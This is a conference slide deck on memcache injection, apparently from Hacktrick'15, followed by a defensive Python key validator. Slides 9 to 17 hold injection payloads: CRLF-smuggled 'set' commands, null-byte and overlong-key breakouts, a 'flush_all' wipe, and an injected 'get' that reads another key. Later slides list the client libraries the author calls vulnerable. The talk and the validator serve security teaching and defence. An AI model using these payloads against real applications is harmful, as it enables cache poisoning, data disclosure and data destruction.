Memcache Injection (Hacktrick'15)

Published in: Software

  1. Memcache Injection
       Ömer Çıtak – Hacktrick’15
  2. #! whoami
       Full-Stack Developer @ Cydets Inc.
       development && security
       www.omercitak.com
       Social : @Om3rCitak
  3. #! memcached.jpg
  4. #! cat using_memcached
  5. #! phpstorm memcached.php
  6. #! telnet 127.0.0.1 11211
       > set key 0 10 5
       > value
       < STORED
       > get key
       < VALUE key 0 5
       < value
       < END
  7. #! phpstorm memcached.php
       memcached.php?key=
  8. #! phpstorm memcached.php
       memcached.php?key=omer
  9. #! phpstorm memcached.php
       ?key=omer+0+3600+6+\r\n+hacked+\r\n
  10. #! phpstorm memcached.php
       ?key=omer 0 10 6 \r\n hacked \r\n
       urlencode(‘\r’) = %0d
       urlencode(‘\n’) = %0a
       ?key=omer 0 10 6 %0d%0a hacked %0d%0a
  11. #! telnet 127.0.0.1 11211
       > set omer 0 3600 6
       > hacked
       < STORED
       > 123456
       < ERROR
  12. #! phpstorm memcached.php
       ?key=aaaaa…(251) set yenikey 0 3600 6 %0d%0a hacked %0d%0a
       ?key=a %00 set yenikey 0 3600 6 %0d%0a hacked %0d%0a
       ?key=aaaaa…(251) flush_all %0d%0a
  13. #! phpstorm memcached.php
  14. #! phpstorm memcached.php
       ?key=omer
  15. #! phpstorm memcached.php
       > get key_omer
       < VALUE key_omer 0 6
       < 123456
       < END
  16. #! phpstorm memcached.php
       ?key=aaa (251) %0d%0a get omer 0 6
  17. #! phpstorm memcached.php
       > get aaa (251)
       < ERROR
       < get omer
       < VALUE omer 0 6
       < 353535
       < END
  18. #! cat vulnerable_libraries
       Python : Python-pylibmc
       Php : Memcached
       Asp.Net : memcacheddotnetproject (1.1.5)
       Java : com.meetup.memcached
  19. #! cat safe_libraries
       Python : python-memcache
       Php : memcache
       Java : java.net.spy.memcached
  20. #! cat using_memcached
       • Wordpress
       • Joomla 3.2.2
       • Piwik 2.1.0
       • MODX Revolution 2.3
  21. fixed?
  22. fixed?
  23. #! questions?
  24. #! exit
       Thanks <3
       www.omercitak.com
       Social : @Om3rCitak
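
A key check that rejects the request parameters shown on slides 9 to 17, as an added example that is not code from the talk: memcached's text protocol limits a key to 250 bytes with no whitespace or control characters, so the application can enforce that before any client library sees the key. The function names, the `key_` prefix (borrowed from slide 15) and the sample inputs are assumptions constructed for illustration.

```python
import hashlib

MAX_KEY_LEN = 250  # memcached text-protocol key limit, in bytes

class InvalidKey(ValueError):
    """Raised when a key cannot be sent safely as one protocol token."""

def validate_key(key: str) -> bytes:
    """Return the key as bytes, or raise InvalidKey."""
    raw = key.encode("utf-8")
    if not raw:
        raise InvalidKey("empty key")
    if len(raw) > MAX_KEY_LEN:
        raise InvalidKey("key longer than 250 bytes")
    # Space, CR, LF, NUL and every other control byte would end the key
    # token early and let the remainder be parsed as further protocol text.
    if any(b <= 0x20 or b == 0x7F for b in raw):
        raise InvalidKey("whitespace or control byte in key")
    return raw

def hashed_key(user_input: str, prefix: str = "key_") -> bytes:
    """Map arbitrary input to a fixed-length, protocol-safe key."""
    digest = hashlib.sha256(user_input.encode("utf-8")).hexdigest()
    return validate_key(prefix + digest)

def build_get(key: str) -> bytes:
    """Build one text-protocol 'get' line from a validated key."""
    return b"get " + validate_key(key) + b"\r\n"

def check(inputs):
    """Return {input: bool} telling whether validate_key accepts each one."""
    out = {}
    for s in inputs:
        try:
            out[s] = bool(validate_key(s))
        except InvalidKey:
            out[s] = False
    return out

# Constructed sample inputs modelled on the slides' request parameters.
SAMPLES = ["omer", "omer 0 3600 6\r\nhacked\r\n", "a\x00set", "a" * 251]

if __name__ == "__main__":
    for k, ok in check(SAMPLES).items():
        print(repr(k[:30]), "accepted" if ok else "rejected")
```

`hashed_key` is the option to use when keys are derived from free-form input: the digest is always 64 hex characters, so length and character checks cannot fail regardless of what the request carried.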
